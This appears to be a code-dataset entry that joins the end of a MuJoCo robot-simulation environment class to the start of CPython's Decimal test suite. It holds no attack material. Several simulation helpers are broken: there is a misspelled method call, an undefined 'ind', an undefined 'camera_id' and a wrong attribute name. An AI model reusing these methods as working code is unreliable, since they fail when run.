pos = self.physics.data.qpos[adr+3:adr+7].copy()
else:
pos = self.physics.data.qpos[adr:adr+3].copy()
self._type_cache[name] = 'joint'
except Exception as e:
item_type = 'body'
if item_type == 'body':
try:
item_ind = model.name2id(name, 'body')
arr = self.physics.data.xquat if rot else self.physics.data.xpos
pos = arr[item_ind].copy()
# pos = self.physics.data.xpos[item_ind].copy()
self._type_cache[name] = 'body'
except Exception as e:
item_ind = -1
assert not np.any(np.isnan(pos))
return pos
def get_item_rot(self, name, mujoco_frame=True, to_euler=False):
rot = self.get_item_pos(name, mujoco_frame, True)
if to_euler:
rot = T.quaternion_to_euler(rot)
return rot
def set_item_pos(self, name, pos, mujoco_frame=True, forward=True, rot=False):
item_type = 'joint'
if np.any(np.isnan(pos)): return
if name in self._type_cache:
item_type = self._type_cache[name]
if item_type == 'joint':
try:
ind = self.physics.model.name2id(name, 'joint')
adr = self.physics.model.jnt_qposadr[ind]
if rot:
old_pos = self.physics.data.qpos[adr+3:adr+7]
self.physics.data.qpos[adr+3:adr+7] = pos
else:
old_pos = self.physics.data.qpos[adr:adr+3]
self.physics.data.qpos[adr:adr+3] = pos
self._type_cache[name] = 'joint'
except Exception as e:
item_type = 'body'
if item_type == 'body':
try:
ind = self.physics.model.name2id(name, 'body')
if rot:
old_pos = self.physics.data.xquat[ind]
self.physics.data.xquat[ind] = pos
else:
old_pos = self.physics.data.xpos[ind]
self.physics.data.xpos[ind] = pos
self.physics.model.body_pos[ind] = pos
# old_pos = self.physics.model.body_pos[ind]
item_type = 'body'
self._type_cache[name] = 'body'
except:
item_type = 'unknown'
print(('Could not shift item', name))
if forward:
self.physics.forward()
def set_item_rot(self, name, rot, use_euler=False, mujoco_frame=True, forward=True):
if use_euler or len(rot) == 3:
rot = T.euler_to_quaternion(rot, 'wxyz')
self.set_item_pos(name, rot, mujoco_frame, forward, True)
def get_joints(self, jnts, sizes=None, vec=False):
if vec:
vals = []
else:
vals = {}
for i, jnt in enumerate(jnts):
if type(jnt) is not int:
jnt = self.physics.model.name2id(jnt, 'joint')
adr = self.physics.model.jnt_qposadr[jnt]
size = 1
if sizes is not None:
size = sizes[i]
if vec:
vals.extend(self.physics.data.qpos[adr:adr+size])
else:
name = self.physics.model.id2name(jnt, 'joint')
vals[name] = self.physics.data.qpos[adr:adr+size]
return vals
def set_joints(self, jnts, forward=True):
for jnt, val in list(jnts.items()):
if type(jnt) is not int:
jnt = self.physics.model.name2id(jnt, 'joint')
adr = self.physics.model.jnt_qposadr[jnt]
offset = 1
if hasattr(val, '__len__'):
offset = len(val)
self.physics.data.qpos[adr:adr+offset] = val
if forward:
self.physics.forward()
def get_jnt_vec(self, jnts):
if not len(jnts): return self.physics.data.qpos
vals = []
for name in jnts:
ind = self.physics.model.name2id(name, 'joint')
adr = self.physics.model.jnt_qposadr[ind]
vals.append(adr)
return self.physics.data.qpos[vals]
def get_disp(self, body1, body2):
pos1 = self.get_item_pos(body1)
pos2 = self.get_itme_pos(body2)
return pos2 - pos1
def get_body_info(self):
info = {}
for i in range(self.physics.model.nbody):
info[i] = {
'name': self.physics.model.id2name(i, 'body'),
'pos': self.physics.data.xpos[i],
'quat': self.physics.data.xquat[i],
}
return info
def get_jnt_info(self):
info = {}
dofadr = self.physics.model.jnt_dofadr
for i in range(self.physics.model.njnt):
inds = (dofadr[i], dofadr[i+1]) if i < self.physics.model.njnts-1 else (dofadr[i], self.physics.model.njnt)
body_id = self.physics.model.jnt_bodyid[i]
info[i] = {
'name': self.physics.model.id2name(i, 'joint'),
'angle': self.physics.data.qpos[inds[0]:inds[1]],
'dofadr': inds,
'body': self.physics.model.id2name(body_id, 'body'),
'parent_body': self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body')
}
return info
def get_geom_dimensions(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1):
'''
Geom type options:
mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
'''
if geom_ind >= 0:
return self.physics.model.geom_size[ind]
inds = np.where(self.physics.model.geom_type == geom_type)
return self.physics.model.geom_size[inds]
def get_geom_positions(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1):
'''
Geom type options:
mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
'''
if geom_ind >= 0:
return self.physics.model.geom_pos[ind]
inds = np.where(self.physics.model.geom_type == geom_type)
return self.physics.data.geom_xpos[inds]
# def get_geom_rotations(self, geom_type=enums.mjtGeom.mjGEOM_BOX, geom_ind=-1, use_euler=False):
# '''
# Geom type options:
# mjGEOM_PLANE=0, mjGEOM_HFIELD=1, mjGEOM_SPHERE=2, mjGEOM_CAPSULE=3, mjGEOM_ELLIPSOID=4, mjGEOM_CYLINDER=5, mjGEOM_BOX=6, mjGEOM_MESH=7
# '''
# if geom_ind >= 0:
# return self.physics.model.geom_quat[ind]
# inds = np.where(self.physics.model.geom_type == geom_type)
# rots = self.physics.data.geom_xquat[inds]
# if use_euler:
# return np.array([T.quaternion_to_euler(r) for r in rots])
# return rots
def get_camera_info(self, camera_name):
ind = self.physics.model.name2id(camera_name, 'camera')
fovy = self.physics.model.cam_fovy[ind].copy()
pos = self.physics.data.cam_xpos[ind].copy()
mat = self.physics.data.cam_xmat[ind].copy()
return fovy, pos, mat
def record_video(self, fname, actions=None, states=None, height=0, width=0, mode='position'):
if not self.load_render:
raise AssertionError('Cannot record video if the renderer is not loaded')
elif actions is None and states is None:
raise AssertionError('Must pass either action or state trajectory to record video')
ims = []
buf = actions if actions is not None else states
for step in buf:
if actions is not None: self.step(step, mode=mode)
if states is not None: self.set_state(step)
im = self.render(camera_id=camera_id, height=height, width=width, view=False)
ims.append(im)
np.save(fname, ims)
def set_user_data(self, key, data):
self._user_data[key] = data
def get_user_data(self, key, default=None):
return self._user_data.get(key, default)
def compute_reward(self):
return 0
def is_done(self):
return self._cur_iter >= self._max_iter
def get_text_overlay(self, title='', body='', style='normal', position='top left'):
return TextOverlay(title, body, style, position)
def render(self, mode='rgb_array', height=0, width=0, camera_id=0,
overlays=(), depth=False, scene_option=None, view=False,
forward=False):
if not self.load_render: return None
# Make friendly with dm_control or gym interface
depth = depth or mode == 'depth_array'
view = view or mode == 'human'
if height == 0: height = self.im_height
if width == 0: width = self.im_wid
if forward: self.physics.forward()
pixels = None
if self._cache_rendering:
prev_x, prev_q = self._last_rendered_state
x_changed = prev_x is None or np.any(np.abs(prev_x - self.physics.data.xpos) > 1e-5)
q_changed = prev_q is None or np.any(np.abs(prev_q - self.physics.data.qpos) > 1e-5)
if x_changed or q_changed:
self._cached_images = {}
self._last_rendered_state = (self.physics.data.xpos.copy(), self.physics.data.qpos.copy())
elif (camera_id, height, width) in self._cached_images:
pixels = self._cached_images[(camera_id, height, width)]
if pixels is None:
pixels = self.physics.render(height, width, camera_id, overlays, depth, scene_option)
if self._cache_rendering: self._cached_images[(camera_id, height, width)] = pixels
if view and self.use_viewer:
self._render_viewer(pixels)
return pixels
def reset(self):
self._cur_iter = 0
self.physics.reset()
# self._reload_viewer()
self.ctrl_data = {}
self.cur_time = 0.
self.prev_time = 0.
self.physics.data.qpos[:] = 0.
self.physics.data.qvel[:] = 0.
self.physics.data.qacc[:]= 0.
self.physics.forward()
return self.get_obs()
def close(self):
self.active = False
if self._viewer is not None and self.use_glew:
self._viewer.close()
self._viewer = None
self.physics.free()
def seed(self, seed=None):
np.random.seed(seed)
random.seed(seed)
def list_joint_info(self):
for i in range(self.physics.model.njnt):
print('\n')
print(('Jnt ', i, ':', self.physics.model.id2name(i, 'joint')))
print(('Axis :', self.physics.model.jnt_axis[i]))
print(('Dof adr :', self.physics.model.jnt_dofadr[i]))
body_id = self.physics.model.jnt_bodyid[i]
print(('Body :', self.physics.model.id2name(body_id, 'body')))
print(('Parent body :', self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body')))
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import warnings
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
